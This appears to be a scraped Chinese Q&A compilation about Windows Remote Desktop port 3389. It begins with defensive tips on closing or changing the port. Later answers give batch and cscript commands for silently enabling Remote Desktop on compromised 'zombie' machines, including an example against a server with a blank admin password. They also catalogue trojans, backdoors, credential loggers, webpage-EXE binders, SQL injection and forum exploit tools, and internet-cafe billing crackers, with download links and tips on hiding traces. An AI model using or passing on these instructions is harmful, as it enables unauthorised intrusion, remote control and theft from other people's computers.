电脑被黑客通过3389端口入侵
修改远程桌面端口吧,如果想自己弄具体方法可以网上查一下,
如果不熟悉,建议上个服务器专用软件,不要上个人电脑使用的安全软件(不针对服务器没然并卵),比如服务器安全狗,护卫神之类的,免费版就可以了。用软件检测一下,改修复的修复就好了。这样方便快捷。
3389是什么漏洞
原指计算机的3389端口, 一般被用来代指远程桌面,可以被修改。它并不是一个木马程序,但如果不是必须的,建议关闭该服务。 原指计算机的3389端口 因为它属于WINDOWS的 远程桌面的 初始端口[可以修改] 3389所以一般被用来 代指 远程桌面 微软的远程桌面 是为了方便广大计算机管理员远程管理自己的计算机而设定的, 但是只要有管理密码,3389可以为任何有管理密码的人提供服务…… 大部分黑客都喜欢在 肉鸡上开个3389, 因为3389是系统的正常服务,使用也非常方便。 它能达到 灰鸽子 这类的远程控制软件的一样的效果,最主要它是正常服务…… 3389很容易通过各种扫描工具(如superscan\x-scan等)得到,由于一些电脑使用者缺乏安全意识经常给administrator\new帐户密码留空,这样菜鸟们可以用mstsc.exe以GUI模式登陆别人的电脑.为防止别人利用3389登陆计算机最好给每个帐户设置密码或用防火墙关闭该端口. 编辑本段应用 3389建议关闭. 关闭3389端口的方法: 首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。如果不是必须的,建议关闭该服务。 win2000 server 开始--程序--管理工具--服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。 win2000 pro 开始--设置--控制面板--管理工具--服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。 windows xp关闭的方法:在我的电脑上点右键选属性--远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。 通过注册表关闭3389端口 开始---运行 输入regedit打开注册表 [HKEY_LOCAL_MACHINE\System\control\Terminalserver\wds\rdpwd\tds\tcp分支,选中名为portnumber的键值,将其3389改为其他(如1234)看我操作这里control有2个分别为controlSET001 和controlSET002我一个一个来 先进controlSET001再来controlSET002 下面我们在看currentcontrolset [HKEY_LOCAL_MACHINE\System\currentcontrolset\control\Terminalserver\winstations\RDP-Tcp\PortNumber分支里应该有一个或者很多类似的子键,一样的改他的值3389为其他(如1234)
怎样破解3389远程登陆密码?
1.怎么样开3389端口,这里我把他们总结一下,很全面,希望对你有用:
1,打开记事本,编辑内容如下:
echo [Components] c:\sql
echo TSEnable = on c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
使用方法:
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
c:\cscript ROTS.vbs 目标IP 用户名 密码 [服务端口] [自动重起选项]
服务端口: 设置终端服务的服务端口。默认是3389。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
使用此参数时,端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误,就继续安装好了。
如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
3,下载3389自动安装程序-djshao正式版5.0
说明:
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持中日韩繁四个版本的win2000服务器版!
4,下载DameWare NT Utilities 3.66.0.0 注册版
安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK
5.运用远程开启3389软件开启(需要有对方机子的管理员帐号和密码)
6.在自己机上安装一个20cn的ftp服务器,在对方的dos下将本机的3389开启工具下载到对方机子,然后执行.
2.CGI后门:
cgi网页后门 cgi网页后门,envymask编写...《
网页合并器 本程序可以自动生成网页,可以把网页和EXE合成新的网页,在打开网页的同时自动运行EXE文件.你将木马合并在一个网页中,别人浏览之后,呵呵,我什么都没说~~~
海阳顶端网木马 windows环境下永远不会被查杀的木马,因为它是用asp做的,也是一套asp在线极好的网页编辑软件,支持在线更改、编辑、删除任意文本文件,同时最重要的是解决了无组件asp上传...(中文版
cgi-backdoor 几个cgi木马(十多种利用最新漏洞的web脚本后门,涵盖jsp,php,asp,cgi等等) *
命令行后门类
winshell
WinShell是一个运行在Windows平台上的Telnet服务器软件,主程序是一个仅仅5k左右的可执行文件,可完全独立执行而不依赖于任何系统动态连接库,尽管它体积小小,却功能不凡,支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等...《入侵NT中winshell的使用》
Gina
Gina木马的主要作用是在系统用户登陆时,将用户登陆的名字,登陆密码等记录到文件中去,因为这个DLL是在登陆时加载,所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户...儒
Wollf1.5 我们的一位女黑客写的软件,扩展Telnet服务,集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能,可反向连接,可通过参数选择随系统启动或作为普通进程启动
WinEggDrop Shell 1.50最终版在 一个扩展型的telnet后门程序{中国最强的后门}
**********************************************************************************************
菜鸟扫描软件!
20CN IPC 扫描器正式版
全自动IPC扫描器,可以同步植入木马,可以透过部分没有配置完整的防火墙,能够探测流光探测不到的一些用户...(中文版)
网络肉鸡猎手
一个快速查找网络肉鸡的小工具
网页信息神探 使得网页不再有秘密,各种信息一目了然,什么电影、图片、Email地址、文章、Flash、压缩文件、可执行文件...等等的链接地址无处可藏!连续而快速下载各种软件、打包教程、VB、VC、动画教程、Flash、电影、写真图片
**************************************************************************************
SQL2.exe SQL蠕重听过吧,就是的这个漏洞!
NetScanTools 一款功能强大的网络工具包...(英文版)
dvbbs.exe
动网logout.asp利用程序
THCsql
针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序,内含源代码。
小紫V2.0追加版
*小紫*(LB论坛噩梦)V2.0追加版加入LB.EXE,可以获得论坛管理员权限。
LB5论坛轰炸机
我兄弟写的程序,{推存}
LB5论坛轰炸机修正版2.5在LB5论坛轰炸机修正版2.0的原有功能基础上增加以下功能及特性:1同时支持6线程轰炸,速度可比V2.0提高一倍以上 2机器智能重新增加,带有自动转向定位功能 3增加监视窗口 4标题可改...(
MSN 消息攻击机
这是一个用于MSN Messenger 的消息攻击机(其实不局限于MSN 的),它具有超快的攻击速度,据测试,在普通Pentium 200 MMX 攻击速度可以达到5条/秒。而且软件体积极小,有效节省系统资源...(
怪狗专用版3389登陆器 我改的一个小程序,有用户名密码,用它可以3389登陆win系统,(必备)
DameWare NT Utilities
一款功能强大的Windows NT/2000/XP 服务器远程控制软件,只要拥有一个远程主机的管理帐号,就能使用它远程GUI下登陆交互控制主机...(英文版)《
追捕: 找到IP所在地!
柳叶擦眼
这个小软件可以列出系统所有的进程(包括隐藏的),并可以杀死进程.这个是共享软件...(中文版)《让传奇木马走开》
Xdebug ey4s大哥写的windows 2000 kernel exploit,有了它提升权限就简单了!
代理之狐 可得到最新代理,用于隐藏真实IP,不过,有能力最好自己在肉机上做个代理安全!
HackerDicBuilder 本软件属于一款字典制作工具,根据国人设置密码的习惯,利用线程技术,生成字典文件 ... (中文版) 多位朋友点播
scanipc 这个是木头见过的最傻瓜化的入侵软件了,只要设置好你要上传的后门和IP范围,它就会开始工作了,界面简单实用,全自动IPC扫描器,可以同步植入木马,可以透过部分没有配置完整的防火墙,能够探测流光探测不到的一些用户 ...
Tiny Honeypot 这是一款简单的蜜罐程序,主要基于iptables的重定向和一个xinetd监听程序,它监听当前没有使用的每个TCP端口记录所有的活动信息,并且提供一些回送信息给入
黑客的攻击到底是内部还是外部.远程控制3389貌似不连网就连接不上.?
黑客在内部,攻击就是内部攻击,黑客在外部,攻击就是外部攻击!
远程控制3389肯定要联网的,不是就不叫做远程控制了!网不连何来的连接?
满意了吧?
黑客常的伎俩有哪些?
常用很多dos命令的 taskkill taskkill /PID 1248 /t tasklist 查进程 cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限 iisreset /reboot tsshutdn /reboot /delay:1 重起服务器 logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户, query user 查看当前终端用户在线情况 要显示有关所有会话使用的进程的信息,请键入:query process * 要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2 要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2 要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02 命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启 命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统 命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。 命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! 下载 X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! 下载 SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! 下载 Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor 下载 Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! 下载 SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! 下载 U-Scan.exe 非常好的UNICODE漏洞扫描工具! 下载 RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! 下载 SHED 1.01 一个用来扫描共享漏洞的机器的工具! 下载 DSScan V1.00 ms04-011远程缓冲区溢出漏洞扫描专用! 下载 Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! 下载 WebDAVScan v1.0 针对WEBDAV漏洞的扫描工具! 注意:该软件解压缩时会被查杀! 下载 Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! 下载 SQLScan v1.2 猜解开着1433端口的住机密码工具! 下载 RPC漏洞扫描器 v1.03 针对RPC漏洞扫描的工具! 下载 流光5.0 破解版 国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 下载 自动攻击探测机 Windows NT/2000 自动攻击探测机 下载 4899空口令探测 能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 下载 二、远程控制 黑洞2004 免杀版 藏鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 下载 冰河2004 免杀版 国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器端只有16KB! 下载 灰鸽子迷你版 灰鸽子工作室-葛军同志的作品! 下载 网络神偷 5.7 网络神偷是一个专业级的远程文件访问工具!具有反弹功能! 下载 广外女生 1.53 广州-广外女生小组的作品,曾风靡一时! 注意:该软件解压缩时会被查杀! 下载 Radmin3.2影子版 非常有名的监视程序!并非木马,所以服务端不会被查杀! 下载 黑社会 2.0 使用跟Radmin一样,功能明显比它多,扫描速度也非常快! 下载 风雪远程控制 v3.9 基于TCP/IP协议的远程管理网络工具,一个具有反弹功能的工具,非常小巧! 下载 无赖小子 2.5 无赖小子2.5,08月23日发布,其默认端口8011! 下载 蓝色火焰 v0.5 蓝色火焰是一个没有客户端的木马,可谓无招胜有招!注意:该软件解压缩时会被查杀! 下载 网络公牛 国产公牛木马,由于上传文件大小限制,包中没有加入易语言运行库文件krnln.fnr! 下载 GoToMyPC 4.00 安装简单;能够从任何安装有浏览器的计算机上访问主机;具有新的安全功能! 下载 三、入侵必备 SQL综合利用工具 非常好的一个SQL连接器,除了可以输入CMD命令外,还可以直接上传软件! 下载 SuperSQLEXEC 用来连接sql server的工具! 下载 3389.exe 开远程机器3389端口的小东东!只要把程序上传到肉鸡运行后,重启既可! 下载 c3389.exe 是一个可以显示、更改本机或远程主机终端服务端口的小程序! 下载 3389.bat 一个开3389端口的批量处理! 下载 3399终端登陆器 用来远程登陆3389肉鸡终端的工具!这个win2000以上都有,以下的都没有! 下载 Opentelnet 远程开telnet的工具! 下载 NTLM.exe 去除ntlm验证的小工具,上传后执行,然后再telnet上去既可! 下载 Hide Admin V2.0 用来隐藏肉鸡上管理员帐号的工具!不过管理员帐号必须有$号哦! 下载 用的一个抓包工具,也是黑客经常使用的工具! 下载电脑-交换机-路由器 192.168.1.1~SSSO伴侣1.2 更直观的入侵,把dos下的入侵实战搬到图形界面上来! 下载 3389终端复制补丁 只要安装了该补丁,就可以直接把你需要上传的东西拖拽到肉鸡上!非常方便哦! 下载 TFTP32 非常使用的一个上传工具!也是大家经常使用的哦! 下载 Wget.exe 命令行下的http下载软件! 下载 Pulist.exe 使用pulist.exe 来获取已经登陆帐户的winlogon.exe 的PID 值! 下载 FindPass.exe 找管理员密码,需要PULIST配合! 下载 入侵助手1.0 该工具可以将dos下的入侵命令直接生成给黑客! 下载 Snake的代理跳板 让机器成为sock5代理软件的程序,可以用它隐藏自己的ip. 下载 Fport.exe 命令行下查看系统进程与端口关联! 四、注入工具 NBSI 2.0 NB联盟小竹编写的一个非常强悍sql注射工具! 下载 CASI 1.10 安全天使-superhei编写的一个php注射工具,亦是国内首发的第一个php注射工具! 下载 sqlasc.exe NB联盟出的注射点扫描工具! 下载 sql_injection 自贡学生联盟出的sql注射工具,跟臭要饭的哪个差不多! 下载 绝世猜解SQL注射 1.0 BUGKIDZ-臭要饭的!以前编写的sql注射工具,使用率相当广泛!简单实用的工具! 下载 五、网吧工具 还原转存大师 藏鲸阁出的还原转存大师,大家都认识!不做介绍! 下载 还原精灵清除器 CY07工作室出的一个还原精灵清除器!好久以前我用过,感觉非常不错! 下载 还原精灵密码读取 还原精灵密码读取!读取还原精灵密码的工具! 下载 还原卡密码破解程序 非常好用的还原卡密码破解程序! 下载 Pubwin4.3 修改程序 目的:跳过管理验证,并且可以免费上网! 下载 美萍9.0密码破解器1.0 美萍9.0密码破解器1.0!做破解使用! 下载 万象2R最新版破解器 万象2R最新版破解器!做破解使用! 下载 万象普及版密码破解器 可以显示退出密码;运行设置程序密码;注意:该软件解压缩时会被查杀! 下载 网吧管理集成破解器 网吧管理集成破解器,功能挺多的哦! 下载 Pubwin精灵 程序运行后,首先点击破解按钮,当显示破解成功后请点注销按钮.... 下载 小哨兵密码清除器 小哨兵密码清除,没有测试过,大家试试! 下载 解锁安全器2.0 解锁安全器2.0! 下载 硬盘还原卡破解程序 硬盘还原卡破解程序! 下载 还原卡解锁 还原卡解锁! 下载 Bios密码探测器 Bios密码探测器,速度很快的哦! 下载 共享密码扫描器 共享密码扫描器,也是一个不错的工具! 下载 硬盘还原卡工具包 硬盘还原卡工具包,零件很多,大家试试吧! 下载 干掉Windows2000 干掉Windows2000! 下载 注册表解锁器 注册表破解器!解锁用的! 下载 网上邻居密码破解器 网上邻居密码破解器,速度也很快哦! 下载 六、漏洞利用 动网7SP1,2,SQL注入 动网7SP1,7SP2,SQL版USER-AGENT注入利用程序!桂林老兵作品! 下载 动网上传利用程序 动网上传漏洞利用程序!桂林老兵作品! 下载 动网上传漏洞利用 动网上传漏洞利用程序,臭要饭的!作品! 下载 BBS3000漏洞利用工具 BBS3000漏洞利用工具,俺是奋青作品! 下载 尘缘雅境漏洞利用工具 尘缘雅境上传漏洞利用工具,俺是奋青作品! 下载 上传漏洞利用4in1 上传漏洞利用程序4合1! 下载 七、嗅探监听 nc.exe NC.EXE是一个非标准的telnet客户端程序!安全界有名的军刀! 下载 NetXray 一款非常好的网络分析和监控软件 下载 Sniffer Pro 4.7 想成为真正的黑客高手,那就先学会使用该工具吧! 下载 灰鸽子:http://61.129.76.80/down?cid=173FB75BC7CCD752395FCD2D554BCF52247D7AC2t=502fmt=- 阿D工具包: http://61.129.76.80/down?cid=807BA7846336E15F49D08161B66D6DE368806CF2t=202fmt=- ssport扫描:http://crc.onlinedown.net:82/down/ssport.rar NTscan:http://cqhk.14023.com/down/NTscan%BA%BA%BB%AF%B0%E6.rar IP数据库纯真版:http://www.xdowns.com/soft/xdowns.asp?softid=31375downid=5id=36514 Recton V2.5 D贺专用版:http://www.luyi61.net/Soft/UploadSoft/mmhm/200610/Recton.rar 局域网查看工具:http://flashget.newhua.com:82/down/LanSee163.rar 站长助手公开版:http://xzdx.hack58.net/hack58/ly/061229zs.rar 北斗4.1破解版:http://down.98959.com:90/%C8%ED%BC%FE%CF%C2%D4%D8/2006/8/25/20060825085921853.rar 木马彩衣715SVK:http://download.77169.com/soft/hacrktools/keyboard/2006/mmcyzj.zip Private exe Protector:http://1.wt1.crsky.com/200703/pep200.rar
3389端口的使用
3389可以用XP自带的远程桌面连接工具进行连接具体步骤:开始--程序---附件--通讯--远程桌面连接
也可以用3389登陆器软件进行连接
你可以去这里下载
http://77169.com/Soft/Index.html
3389端口是一个远程桌面连接端口...
开放此端口可以远程连接此电脑进行操作...
下面的仅供参考:
现在3389端口已经没什么实在意义了..
因为即使对方开了3389你没有用户名和密码还是登不上..
只有用暴力破解....而且现在大多数人用的是XP系统
它不允许一个用户名同时登陆....
还不如利用139.445端口呢...